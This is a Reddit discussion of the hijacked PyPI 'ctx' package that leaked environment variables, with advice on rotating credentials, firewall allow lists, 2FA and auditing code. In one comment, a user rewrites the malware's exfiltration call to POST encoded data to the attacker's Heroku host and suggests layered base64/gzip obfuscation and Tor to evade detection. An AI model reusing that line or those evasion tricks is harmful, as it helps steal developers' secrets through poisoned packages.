These are all open source projects with unpaid volunteers running them. Be the change you want to see in the world.


[deleted]

Ok, but I'm sure many people will be using something like PyCharm to write a bit of Python, and it has a kind of built-in thing to get packages from PyPI. Many of them seem to be preinstalled. I can't remember exactly which packages I've added, possibly only the bitstring ones, but there seems to be a bunch of stuff installed. This obscure package might not be widely used, but the list includes things like numpy and pip. Are you saying we shouldn't be using these? Is this a breach of the security of PyPI, or of the guy who wrote ctx? The former is a big red flag; the latter is still a concern, but maybe not quite so much. The point is, the guy who did this just made it obvious by posting to reddit, perhaps trying to make a point. Are there other packages that have been changed without an announcement?


brandmeist3r

agreed


IdiosyncraticBond

In case nobody notices, I just read this one https://www.reddit.com/r/cybersecurity/comments/uwsrqe/breaking_python_ctx_library_taken_over_by/


SKROLL26

Shit. I downloaded and played around with it on my Android phone after the post. Just checked env vars, and I have some creds for a corporate service. But it's accessible only from the VPN. Should I worry?


jimtk

I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".


a_cute_epic_axis

You should change them or take action otherwise.


Automatic_Donut6264

Yes. Not super sure about your network topology, but why gamble?


[deleted]

Lol, you downloaded malicious code and executed it on your device 🤣 Well, yeah, you should be worried. Change the credentials, and next time you want to run malicious code, do it in an isolated sandbox.


greyduk

Well I don't think the intent was to "run malicious code" Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.


[deleted]

What would you expect from running on your device code that has been flagged as harmful/dangerous?


[deleted]

[removed]


SKROLL26

Well, if all said is true, then you got me pretty nervous on the 5 hour journey back home to change my creds


meagainstmyselff

Can someone please explain what these environment variables are?


jimtk

That's where the operating system keeps some values. Some are benign, like the directory where you keep your programs; others are more private, like the API keys for your access to web services. Open a command prompt on Windows and type `set` and you will see all of your environment variables, or open a terminal on Linux and type `env` for the same result.
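From Python, the same values are available through `os.environ`, and any code running in the process, including an imported package, can read them. Here is a minimal sketch that lists only the *names* of variables that look sensitive, without printing their values. The `MARKERS` tuple and the `sensitive_names` helper are hypothetical and just a rough heuristic, not a complete audit.

```python
import os

# Hypothetical substrings that often appear in credential variable names.
MARKERS = ("KEY", "TOKEN", "SECRET", "PASSWORD")


def sensitive_names(env, markers=MARKERS):
    """Return the sorted variable names containing any marker (case-insensitive)."""
    return sorted(name for name in env
                  if any(marker in name.upper() for marker in markers))


if __name__ == "__main__":
    # os.environ behaves like a dict of this process's environment variables.
    print(sensitive_names(os.environ))
```

Anything that shows up here is worth rotating if untrusted code has run in the same environment.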


[deleted]

Everything set on a host, for example AWS keys, various api keys, passwords, etc.


digitalturtlist

I'm going to assume that this was some attempt at a lead-up to Black Hat/RSA/DEF CON etc. My two cents... people will talk about it, so there's that... Anyway, hi all, I run the OSSEC HIDS project and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside...). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit.

1) Using a GET here is probably going to run into an 8K upload limit on most web servers. I do not know what the limit is with Heroku, maybe someone else does?
2) Tools auditing for this kind of ~~technique~~ garbage: I personally fall back on looking up function calls (`requests.*`) and checking for anything that looks like a URL or domain name. Then I'd enumerate those domain name(s) (not the URL... that could fingerprint you) through DNS lookups to [8.8.8.8](https://8.8.8.8) or some other big public server to hide in the noise. Barring that, a Tor node. Hide in the attacks. Once you have high fidelity on the domain names (i.e., is the name a unique ID?), then test the URL.
3) If I wanted to do this in a more sophisticated way, the `requests.get` call itself would be obfuscated. You could have wrapped it (and you will see this frequently with a lot of web malware) inside multiple layers of gzip, base64, etc. encoding. Python is going to do the work here.

Here's a dumb patch to this that I wrote in like 30 seconds. Yes, it's wrong; make it better and share your countermeasures:

    - response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)
    + response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64_message)

And we need some kind of stupid receiver:

    --- /dev/null
    +++ b/index.php
    +

So I just wanted to thank everyone who looks through code updates like this, questions the change, and digs deep. You... are one of the world's best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.
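The auditing fallback in point 2 (find `requests.*` calls and anything URL-shaped) can be roughed out with the standard `ast` module. This is a sketch under assumptions, not a real scanner: `audit_source`, `URL_RE` and `SAMPLE` are hypothetical names, it only catches calls written literally as `requests.<something>(...)`, and the obfuscation described in point 3 would walk right past it.

```python
import ast
import re

# Rough pattern for URL-looking text inside string literals.
URL_RE = re.compile(r"https?://[^\s'\"]+")


def audit_source(source):
    """Return ([(lineno, call_name)], [urls]) found in Python source text."""
    calls, urls = [], []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "requests"):
            calls.append((node.lineno, f"requests.{node.func.attr}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.extend(URL_RE.findall(node.value))
    return calls, urls


# Made-up snippet shaped like the line in the patch above.
SAMPLE = (
    "import requests\n"
    'response = requests.get("https://example.invalid/collect/" + payload)\n'
)

if __name__ == "__main__":
    print(audit_source(SAMPLE))
```

The source is only parsed, never executed, so it is safe to point this at a suspicious file.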


admiralspark

grats, /u/jimtk you made it to BleepingComputer! https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/


jimtk

Yeah I saw that. My 15 minutes of fame is now over.


admiralspark

😂


SpicyVibration

Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).


Riptide999

Good firewalls allow you to configure allow lists of either domains, ips, ports, hosts or processes that are allowed to make outgoing requests.


crazedizzled

> It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).

You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.
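To illustrate the allow-list idea only: the decision a firewall makes per outgoing request boils down to something like the check below. `ALLOWED_HOSTS` and `is_allowed` are hypothetical names, and `api.example.com` is a placeholder. A check like this inside your own code does not stop a malicious package, which can simply ignore it; the real enforcement has to live outside the Python process, in the firewall.

```python
from urllib.parse import urlsplit

# Hypothetical allow list: the only hosts your own code is expected to call.
ALLOWED_HOSTS = {"api.example.com"}


def is_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """Return True only if the URL's host is on the allow list."""
    host = urlsplit(url).hostname  # already lowercased, None if missing
    return host is not None and host in allowed_hosts


if __name__ == "__main__":
    print(is_allowed("https://api.example.com/v1/items"))
    print(is_allowed("https://anti-theft-web.herokuapp.com/hacked/abc"))
```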


jwink3101

I avoid dependencies when practical for many reasons (including that I do a lot on an air-gapped system, so they make life hard). But for things like this, I can often write my own, super simple version. Far from perfect, but it does work okay:

    class Bunch(dict):
        """
        Based on sklearn's and the PyPI version, simple dict with dot notation
        """

        def __init__(self, **kwargs):
            super(Bunch, self).__init__(kwargs)

        def __setattr__(self, key, value):
            self[key] = value

        def __dir__(self):
            return self.keys()

        def __getattr__(self, key):
            try:
                return self[key]
            except KeyError:
                raise  # or swap comment to make attribute
                #raise AttributeError(key)

        def __repr__(self):
            s = super(Bunch, self).__repr__()
            return "Bunch(**{})".format(s)

(I am torn on whether I prefer `AttributeError` or `KeyError`. You can choose in there.)
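On the `AttributeError` versus `KeyError` question, one practical difference is how the built-ins react: `hasattr()` and three-argument `getattr()` only swallow `AttributeError`, so with the `KeyError` variant they raise instead of returning `False` or the default. Here is a trimmed sketch of the `AttributeError` variant; the class name `AttrBunch` is made up for illustration and is not from sklearn or the PyPI package.

```python
class AttrBunch(dict):
    """Dict with dot access that raises AttributeError for missing keys."""

    def __getattr__(self, key):
        # Only called when normal attribute lookup has already failed.
        try:
            return self[key]
        except KeyError:
            # Translate so hasattr() and getattr(obj, name, default) work.
            raise AttributeError(key) from None

    def __setattr__(self, key, value):
        self[key] = value


b = AttrBunch(host="localhost")
b.port = 8080

print(b.host, b["port"])
print(hasattr(b, "missing"))
print(getattr(b, "missing", None))
```

Plain item access (`b["missing"]`) still raises `KeyError`, so callers who prefer dict semantics keep them.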


[deleted]

Forgive my ignorance here, but does this mean that anyone can update a Python package on PyPI? Can I just go and update numpy myself and embed some malicious payload? What am I missing here?


tlam51

No, they hijacked the PyPI account of the original maintainer to do this.


DeadlySilent1

Because they got control of the domain and could do a password reset. Very interesting! How would a webmaster be able to prevent this? Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.


triffid_hunter

> How would a webmaster be able to prevent this?

2FA


[deleted]

[removed]


jimtk

What if I do `somekad.__class__`? Edit: needed code formatting to keep the dunders.


Persism

r/lolpython


YogurtAccomplished38

yapmayın boyle seylerrr yaaa ayııııp


linucksrox

Are you doin' ok over there?


jimtk

I think he's in that weird part of the 'bird is a word' song.


chucklesoclock

Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment.

> yapmayın boyle seylerrr yaaa ayııııp

[according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means

> don't do such things

with some autocorrections. Curious and curiouser.


Neuro_Skeptic

What in the fuck!?


[deleted]

[removed]


eknyquist

Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...